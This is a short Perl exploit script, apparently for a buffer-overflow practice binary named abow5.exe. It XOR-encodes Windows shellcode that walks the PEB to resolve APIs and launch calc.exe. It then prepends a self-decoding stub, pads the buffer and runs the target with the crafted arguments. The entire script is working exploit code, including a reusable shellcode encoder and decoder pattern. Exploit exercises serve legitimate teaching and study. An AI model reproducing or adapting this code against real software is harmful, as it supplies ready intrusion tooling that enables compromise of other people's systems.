================== exploit.pl ==================

$decoder = "\x44\x8b\xec\x45\x45\x45\x45\xeb\x0f\x58\x80\x30\x90\x40\x81" .
       "\x38\x4f\x4c\x4c\x41\x75\xf4\xeb\x05\xe8\xec\xff\xff\xff";

$shellcode = "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" .
  "\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" .
  "\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" .
  "\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" .
  "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" .
  "\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" .
  "\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" .
  "\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" .
  "\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

$key = "\x90" x 121;
$endof_shellcode = "\x4f\x4c\x4c\x41";
$shellcode = $shellcode ^ $key;
$prefix = "A" x 37;
$postfix = "A " x 0x1326;
$abow5 = "c:/cygwin/home/Administrator/abow5/abow5.exe";
$param = "ABCD" x 256 . "\x7f";
$shell_param = $decoder . $shellcode . $endof_shellcode;

`echo $param | exec $abow5 1025$prefix '$shell_param' $postfix`;